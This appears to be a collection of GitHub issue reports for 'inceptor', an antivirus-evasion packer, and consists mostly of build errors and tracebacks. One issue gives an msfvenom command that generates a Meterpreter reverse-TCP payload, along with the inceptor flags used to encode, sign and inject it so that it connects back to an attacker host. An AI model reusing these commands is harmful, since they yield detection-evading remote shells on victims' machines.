20 Dir(s) 4,876,296,192 bytes free

(venv) C:\Users\Administrator\inceptor\inceptor>python inceptor.py native atlsd.raw -o atlas_packed.exe



[-] Error reading input file

(venv) C:\Users\Administrator\inceptor\inceptor>cd .

(venv) C:\Users\Administrator\inceptor\inceptor>
(venv) C:\Users\Administrator\inceptor\inceptor>cd ..

(venv) C:\Users\Administrator\inceptor>cd inceptor

(venv) C:\Users\Administrator\inceptor\inceptor>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

(venv) C:\Users\Administrator\inceptor\inceptor>dir
Volume in drive C has no label.
Volume Serial Number is 80C0-C300

Directory of C:\Users\Administrator\inceptor\inceptor

11/24/2021 11:14 AM .
11/24/2021 11:14 AM ..
11/23/2021 09:19 PM 145 .gitignore
11/23/2021 09:19 PM 141 .gitmodules
11/23/2021 09:27 PM artifacts
11/24/2021 10:52 AM 62,464 atlas.exe
11/24/2021 10:53 AM 78,148 atlas.raw
11/23/2021 09:27 PM certs
11/23/2021 09:19 PM 5,489 chain-validate.py
11/23/2021 09:45 PM compilers
11/23/2021 09:27 PM config
11/23/2021 09:45 PM converters
11/23/2021 09:19 PM demo
11/23/2021 09:45 PM encoders
11/23/2021 09:45 PM engine
11/23/2021 09:27 PM enums
11/23/2021 09:19 PM 709 export-viewer.py
11/23/2021 09:45 PM generators
11/24/2021 11:16 AM 555 history.txt
11/23/2021 09:19 PM 18,021 inceptor.py
11/23/2021 09:19 PM libs
11/24/2021 10:50 AM 9,909,248 merlin.exe
11/23/2021 09:19 PM 878 meta-clone.py
11/23/2021 09:45 PM obfuscators
11/23/2021 09:45 PM signers
11/23/2021 09:19 PM 2,322 steal-cert.py
11/23/2021 09:19 PM syscalls
11/24/2021 11:04 AM temp
11/23/2021 09:19 PM templates
11/23/2021 09:19 PM tests
11/23/2021 09:19 PM 13,927 update-config.py
11/23/2021 09:27 PM utils
11/23/2021 08:28 PM 207,872 venom.exe
13 File(s) 10,299,919 bytes
20 Dir(s) 4,876,075,008 bytes free

(venv) C:\Users\Administrator\inceptor\inceptor>python inceptor.py native atlas.raw -o atlas_packed.exe



[+] Native Artifact Generator Started At 2021-11-24 10:17:34.200562
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
 [>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
 [>] Phase 3.1: Writing CPP file in .\temp\tmpwy0x8ibr.cpp
[*] Phase 4: EXE compilation and Signing
 [>] Phase 4.1: Compiling EXE...
Traceback (most recent call last):
  File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate
    self.generate_wrapped()
  File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 292, in generate_wrapped
    self.compile_exe(shellcode)
  File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 201, in compile_exe
    status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
  File "C:\Users\Administrator\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
    output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 420, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 501, in run
    with Popen(*popenargs, **kwargs) as process:
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 966, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 1435, in _execute_child
    hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is denied

(venv) C:\Users\Administrator\inceptor\inceptor>

MFC in the static library

I found that the compiler does not use MFC in the static library, which may cause it to not work properly on a computer without the library file.

Possible to include the necessary dlls in the resulted exe? Error: vcruntime140.dll missing

Is your feature request related to a problem?
Yes, when obfuscating native binaries, they cannot run on machines that do not have all the DLLs in place.

Moreover, even when I manually copied over the proper vcruntime140.dll, it will not start, saying:
The application was unable to start correctly (0xxxxxx7b)

Additional context
Ran inceptor over a native binary and executed it on a clean Windows machine.

Thanks again.

Using -m dinvoke causes notepad injection address conflicts

Describe the bug
I use the command containing "-m dinvoke" to compile the packaged exe, which will cause injection of Notepad exceptions.

To Reproduce
My OS is Windows 10 and the VS version is VS2022.
I use msfvenom to create the raw payload in Kali, with the command below:
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
The inceptor bypass command is "python inceptor.py donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15".
Use the command "demo.bat xx.exe" and the injection victim notepad will exit abnormally.
But if I remove the option -m dinvoke, then the final compiled exe can make the reverse connection to Kali successfully.
Or if I remove the option -P, then the final compiled exe can also make the reverse connection to Kali successfully.

Expected behavior
Run "demo.bat xx.exe" and the final compiled payload can make the reverse connection to Kali.

Screenshots
If applicable, add screenshots to help explain your problem.


Debug Info:

  1. Go to your config.ini file
  2. In DEBUG, mark all as 1
  3. Reproduce the bug again
  4. Paste the output given by the tool
▒ by d3adc0de (@klezVirus)
--------------------------------------------------------------------------------------

[DEBUG] Loading module Dinvoke
[DEBUG] Loading module Delay
[+] .Net Artifact Generator Started At 2023-05-29 13:11:56.792864
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Loader
[*] Phase 2: Encoding
  [>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
    [*] Encoded filename: C:\Users\ll\inceptor\inceptor\temp\tmpjl1x2_0v.raw.sgn
  [>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
  [>] Encoder Chain: HexEncoder
  [>] Shellcode size: 1228
  [>] Shellcode Signature: 4cd095380d1813a5d7ce12309e1b7f282cb629cb
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_MANUAL_MAPPING
  [>] Phase 3.1: Writing CS file in .\temp\tmpxm7yrsms.cs
  [>] Phase 3.2: Compiling and linking dependency files in "DInvoke.dll"
[*] Phase 4: Compiling
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"  /target:exe /platform:x64 /unsafe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" /res:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" /r:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"  "C:\Users\ll\inceptor\inceptor\temp\tmpxm7yrsms.cs"
Microsoft (R) Visual C# Compiler version 4.8.3752.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.

This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

[*] Phase 5: Merging Resources
"C:\Users\ll\inceptor\inceptor\libs\public\ILRepack.exe"  /target:exe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe"  "C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" "C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"
INFO: IL Repack - Version 2.0.18
INFO: ------------- IL Repack Arguments -------------
/out:C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe  C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
-----------------------------------------------
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Processing references
INFO: Processing types
INFO: Merging <Module>
INFO: Merging <Module>
INFO: Processing exported types
INFO: Processing resources
INFO: Fixing references
INFO: Writing output assembly to disk
INFO: Finished in 00:00:00.6446447

  [+] Success: packed file stored at C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
  [+] File Signature: cadf3da2d2cc537444b9b57d5081116a2981d290
[*] Phase 6: Sign dotnet binary
'"C:\Users\ll\inceptor\inceptor"' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
  [+] Signed with: CarbonCopy
[*] Phase 7: Finalising
  [+] Success: file stored at demo\xx.exe
[*] Phase 8: Cleaning up
[+] .Net Artifact Generator Finished At 2023-05-29 13:12:00.463994

Additional context
Add any other context about the problem here.

Definition file not working

Hi, I tried your tool using a .def file created with

dumpbin /exports file.dll /out:file.def

I provided the file.def as --exports parameter but I get the following error when executed:

Traceback (most recent call last):
  File "inceptor.py", line 268, in <module>
    generator = NativeArtifactGenerator(binary_abs_path,
  File "C:\Users\Username\Documents\Tools\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 147, in __init__
    self.dll_compiler_args["/DEF"] = f'"{os.path.abspath(self.exports)}"'
TypeError: 'NoneType' object does not support item assignment

How can I set custom exports?

Originally posted by @CT-H00K in #22 (comment)

Python requirements.txt

Hey @klezVirus ,

Apologies firstly. I bring another issue. I tried multiple times, but the new version install fails for me :(

virtualenv --python=python3 venv-python3
venv-python3\Scripts\activate.bat
cd inceptor
pip3 install -r ..\requirements.txt
[...]
ERROR: Could not find a version that satisfies the requirement win32-sectime (from versions: none)
ERROR: No matching distribution found for win32-sectime

Did I do something wrong?

Thanks in advance!

msvpd.dll

I am encountering an issue when trying to encode an existing msfvenom exe:
msvcp140.dll missing
Terminal output:

(venv) C:\Users\Administrator\inceptor\inceptor>cd ..

(venv) C:\Users\Administrator\inceptor>pip install -r requirements.txt
Requirement already satisfied: frida in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 1)) (15.1.12)
Requirement already satisfied: frida-tools in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 2)) (10.4.1)
Requirement already satisfied: jmespath in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 3)) (0.10.0)
Requirement already satisfied: colorama in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 4)) (0.4.4)
Requirement already satisfied: pandas in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 5)) (1.3.4)
Requirement already satisfied: numpy in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 6)) (1.21.4)
Requirement already satisfied: pefile in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 7)) (2021.9.3)
Requirement already satisfied: pycryptodome in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 8)) (3.11.0)
Requirement already satisfied: pyOpenSSL in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 9)) (21.0.0)
Requirement already satisfied: py7zr in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 10)) (0.16.3)
Requirement already satisfied: win32-setctime in c:\users\administrator\inceptor\venv\lib\site-packages (from -r requirements.txt (line 11)) (1.0.3)
Requirement already satisfied: setuptools in c:\users\administrator\inceptor\venv\lib\site-packages (from frida->-r requirements.txt (line 1)) (58.3.0)
Requirement already satisfied: pygments<3.0.0,>=2.0.2 in c:\users\administrator\inceptor\venv\lib\site-packages (from frida-tools->-r requirements.txt (line 2)) (2.10.0)
Requirement already satisfied: prompt-toolkit<4.0.0,>=2.0.0 in c:\users\administrator\inceptor\venv\lib\site-packages (from frida-tools->-r requirements.txt (line 2)) (3.0.22)
Requirement already satisfied: pytz>=2017.3 in c:\users\administrator\inceptor\venv\lib\site-packages (from pandas->-r requirements.txt (line 5)) (2021.3)
Requirement already satisfied: python-dateutil>=2.7.3 in c:\users\administrator\inceptor\venv\lib\site-packages (from pandas->-r requirements.txt (line 5)) (2.8.2)
Requirement already satisfied: future in c:\users\administrator\inceptor\venv\lib\site-packages (from pefile->-r requirements.txt (line 7)) (0.18.2)
Requirement already satisfied: six>=1.5.2 in c:\users\administrator\inceptor\venv\lib\site-packages (from pyOpenSSL->-r requirements.txt (line 9)) (1.16.0)
Requirement already satisfied: cryptography>=3.3 in c:\users\administrator\inceptor\venv\lib\site-packages (from pyOpenSSL->-r requirements.txt (line 9)) (36.0.0)
Requirement already satisfied: brotli>=1.0.9 in c:\users\administrator\inceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (1.0.9)
Requirement already satisfied: pycryptodomex>=3.6.6 in c:\users\administrator\inceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (3.11.0)
Requirement already satisfied: pyzstd>=0.14.4 in c:\users\administrator\inceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (0.15.0)
Requirement already satisfied: pybcj>=0.5.0 in c:\users\administrator\inceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (0.5.0)
Requirement already satisfied: multivolumefile>=0.2.3 in c:\users\administrator\inceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (0.2.3)
Requirement already satisfied: pyppmd>=0.17.0 in c:\users\administrator\inceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (0.17.3)
Requirement already satisfied: texttable in c:\users\administrator\inceptor\venv\lib\site-packages (from py7zr->-r requirements.txt (line 10)) (1.6.4)
Requirement already satisfied: cffi>=1.12 in c:\users\administrator\inceptor\venv\lib\site-packages (from cryptography>=3.3->pyOpenSSL->-r requirements.txt (line 9)) (1.15.0)
Requirement already satisfied: wcwidth in c:\users\administrator\inceptor\venv\lib\site-packages (from prompt-toolkit<4.0.0,>=2.0.0->frida-tools->-r requirements.txt (line 2)) (0.2.5)
Requirement already satisfied: pycparser in c:\users\administrator\inceptor\venv\lib\site-packages (from cffi>=1.12->cryptography>=3.3->pyOpenSSL->-r requirements.txt (line 9)) (2.21)

(venv) C:\Users\Administrator\inceptor>cd inceptor

(venv) C:\Users\Administrator\inceptor\inceptor>python inceptor.py dotnet C:\Users\Administrator\inceptor\inceptor\venom.exe -o Desktop\dropnpack.exe -e xor -e aes -e hex

←[37m@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&←[30m,←[90m,,←[30m,←[37m@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@←[30m←[37m←[30m,←[90m//←[37m&@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@←[90m%←[90m#←[37m/←[30m.←[90m/←[30m
,←[37m@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@←[90m←[90m#←[37m,←[30m,←[90m(←[30m
←[37m@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&←[90m(←[37m(←[30m.←[90m/←[30m/←[37m
%@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&←[30m
←[90m#←[37m
←[30m.←[37m(←[30m*
←[37m&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&←[30m(←[37m(←[30m.←[37m(←[30m,←[37m
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@←[30m
←[90m(←[37m/←[30m.←[90m/←[37m(←
[30m,←[37m@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&←[30m/←[90m(←[37m(←[30m,.←[37m(/←[30m*
←[37m@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&#←[30m/←[90m(←[37m/←[30m,,←[37m//←[30m/
←[37m@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&%←[30m←[90m/←[37m/←[30m,.,←[37m//←[30m
←[37m&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&&←[30m,←[37m←[90m←[30m,..,←[90m/←[37m/←
[30m←[37m&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%←[30m,,,,,..,←[90m**←[30m,←[37m@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&/←[30m,,,←[37m
←[90m,,,←[30m..,,.←[37m%@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&/←[30m,,,←[37m(#(←[90m/←[30m,...,/←[37m@&@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@(&&#←[30m,,,,←[90m
(←[37m%&&%%%←[90m(,←[30m..,,←[90
m%←[37m&&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@←[90m#←[30m/*,
/←[90m/(((/←[30m,,,,,,,,,←[90m//←[37m(//←[3
0m,...←[90m
←[37m%&←[90m&←[37m&@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@&←[90m%%##(////←[30m*/
,,,,,,,,,,,,,,***,,.,.,.,←[90m(←[37m&&&←[9
0m%←[37m@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@←[30m,←[90m&←[37m@%%##←[90m(/←[30m,,,,,,,,.,,,,,,,,,←[90m///←[30m
,,,,,,←[90m
/(←[37m%&@@←[90m%%#←[37m@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@←[90m..,,←[30m,,,,,,,,,,,,,,,,,,,,←[90m,,,
/(///
,←[30m,,,
,←[90m/((
(←[90m%%%←[37m&@@&&←[90m%%#←[37m@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@/←[30m...,←[90m←[37m((((/,((←[30m,,,,,,,←[90m
////←[30m,,,,←
[90m
***((/←[37m##(%&&&@@&←[90m#←[37m@@&←[90m%%←[37m@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@←[30m,.......←[90m,((///,,,,←[37m/#%(/←[30m,,,,,,,,,←[90m
/(/(←[37m%%&&%&@%@&@@←[90m&←[37m@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@%←[30m....................←[90m....,,,/(←[37m((((←[90m
///
,,........←[37m@@@@@@@@@@@@
by d3adc0de (@klezVirus)

[+] .Net Artifact Generator Started At 2021-11-23 14:29:02.312008

[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Pe2sh
[!] Virtual section size is out ouf bounds: 400
[!] Truncated to maximal size: 360, buffer size:4360
[!] Virtual section size is out ouf bounds: 400
[!] Truncated to maximal size: 360, buffer size:4360
Traceback (most recent call last):
File "C:\Users\Administrator\inceptor\inceptor\generators\DotNetArtifactGenerator.py", line 254, in generate
self.generate_wrapped()
File "C:\Users\Administrator\inceptor\inceptor\generators\DotNetArtifactGenerator.py", line 276, in generate_wrapped
shellcode_bytes = self.transformer.transform(target=self.file)
File "C:\Users\Administrator\inceptor\inceptor\converters\Pe2Shellcode.py", line 46, in transform
return bin2hex4pe2sh(outfile)
File "C:\Users\Administrator\inceptor\inceptor\utils\utils.py", line 63, in bin2hex4pe2sh
return unhexlify(subprocess.check_output(f"{utility} "{filename}"").decode().strip())
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 420, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 524, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command 'C:\Users\Administrator\inceptor\inceptor\libs\public\chunlie.exe "C:\Users\Administrator\inceptor\inceptor\temp\venom.shc.exe"' returned non-zero exit status 3221225781.

(venv) C:\Users\Administrator\inceptor\inceptor>

UnicodeDecodeError

It seems to be a coding problem

To Reproduce
python3 inceptor.py native 1.raw -o packed.exe -m syscalls -m dinvoke -P

Complete! Files written to:
E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.h
E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.c
E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.asm
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\ml64.exe" /c /nologo /Zi /Fo"E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.0.obj" /W3 /errorReport:prompt "E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.asm"
Assembling: E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.asm

"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\cl.exe" /permissive- /GS /GL /W3 /Gy /Zi /Gm- /O2 /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "BUILD_DLL" /D "NDEBUG" /D "SAGAT_EXPORTS" /D "_WINDOWS" /D "_WINDLL" /D "_USRDLL" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oi /MD /FC /EHsc /nologo /diagnostics:column /LD /Fo:"E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.1.obj" /I "E:\bypassAV\inceptor\inceptor\temp" "E:\bypassAV\inceptor\inceptor\temp\tmp5h9qny5e.c"
Traceback (most recent call last):
File "E:\bypassAV\inceptor\inceptor\engine\modules\TemplateModule.py", line 84, in from_name
_instance = _class(kwargs=kwargs['kwargs'])
File "E:\bypassAV\inceptor\inceptor\engine\modules\SyscallsModule.py", line 46, in __init__
self.build(kwargs=kwargs)
File "E:\bypassAV\inceptor\inceptor\engine\modules\SyscallsModule.py", line 95, in build
cl.compile([f"{syscalls_basepath}.c"])
File "E:\bypassAV\inceptor\inceptor\compilers\Compiler.py", line 68, in compile
print(output.decode())
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xd5 in position 314: invalid continuation byte
[DEBUG] Loading module Dinvoke
[+] Native Artifact Generator Started At 2022-08-01 14:38:50.065093
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_SYSCALLS
[>] Phase 3.1: Writing CPP file in .\temp\tmpe259n97n.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\cl.exe" /permissive- /Bt+ /GS /W3 /Gy /Zi /Gm- /O2i /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /MD /FC /EHsc /nologo /diagnostics:column /Fe:"E:\bypassAV\inceptor\inceptor\temp\packed-temp.exe" "E:\bypassAV\inceptor\inceptor\temp\tmpe259n97n.cpp" /link
Traceback (most recent call last):
File "E:\bypassAV\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 248, in generate
self.generate_wrapped()
File "E:\bypassAV\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 291, in generate_wrapped
self.compile_exe(shellcode)
File "E:\bypassAV\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 200, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "E:\bypassAV\inceptor\inceptor\compilers\Compiler.py", line 68, in compile
print(output.decode())
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xa1 in position 389: invalid start byte

Installation Errors

git clone --recurse https://github.com/klezVirus/inceptor.git
Produces the following errors

Cloning into 'inceptor'...
remote: Enumerating objects: 272, done.
remote: Counting objects: 100% (272/272), done.
remote: Compressing objects: 100% (203/203), done.
remote: Total 272 (delta 56), reused 272 (delta 56), pack-reused 0
Receiving objects: 100% (272/272), 15.58 MiB | 1.19 MiB/s, done.
Resolving deltas: 100% (56/56), done.
Submodule 'inceptor/obfuscators/powershell/chameleon' ([email protected]:klezVirus/chameleon.git) registered for path 'inceptor/obfuscators/powershell/chameleon'
Cloning into 'C:/Users/user/Desktop/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/user/Desktop/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon'. Retry scheduled
Cloning into 'C:/Users/user/Desktop/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/user/Desktop/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon' a second time, aborting

python update-config.py
Produces the following errors

Traceback (most recent call last):
  File "C:\Users\user\Desktop\inceptor\inceptor\update-config.py", line 325, in <module>
    update_config()
  File "C:\Users\user\Desktop\inceptor\inceptor\update-config.py", line 55, in update_config
    c = Config()
  File "C:\Users\user\Desktop\inceptor\inceptor\config\Config.py", line 16, in __init__
    self.rebase()
  File "C:\Users\user\Desktop\inceptor\inceptor\config\Config.py", line 38, in rebase
    for key, directory in self.config["DIRECTORIES"].items():
  File "C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.9_3.9.1776.0_x64__qbz5n2kfra8p0\lib\configparser.py", line 963, in __getitem__
    raise KeyError(key)
KeyError: 'DIRECTORIES'

PermissionError: [WinError 5] Access is denied

Describe the bug
Permission denied error when run

To Reproduce
Steps to reproduce the behavior:

inceptor.py native HookDetector45.exe -o interceptor_test01.exe

[+] Native Artifact Generator Started At 2022-01-11 21:23:59.140182
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Donut
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
  [>] Phase 3.1: Writing CPP file in .\temp\tmpjm9e2zib.cpp
[*] Phase 4: EXE compilation and Signing
  [>] Phase 4.1: Compiling EXE...
Traceback (most recent call last):
  File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate
    self.generate_wrapped()
  File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 292, in generate_wrapped
    self.compile_exe(shellcode)
  File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 201, in compile_exe
    status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
  File "C:\Users\test\Downloads\interceptor\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
    output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
  File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 420, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
  File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 501, in run
    with Popen(*popenargs, **kwargs) as process:
  File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 966, in __init__
    self._execute_child(args, executable, preexec_fn, close_fds,
  File "C:\Users\test\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 1435, in _execute_child
    hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is denied

Debug Info:
As mentioned in issue #29, I already tried this:

.\obfuscators\native\llvm-clang\llvm-clang\clang-cl.exe
clang-cl: error: no input files

running with DEBUG=1

inceptor.py native messagebox_shellcode.raw -o int_msg.exe

[+] Native Artifact Generator Started At 2022-01-11 21:41:27.491180
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
  [>] Phase 3.1: Writing CPP file in .\temp\tmptayar5px.cpp
[*] Phase 4: EXE compilation and Signing
  [>] Phase 4.1: Compiling EXE...
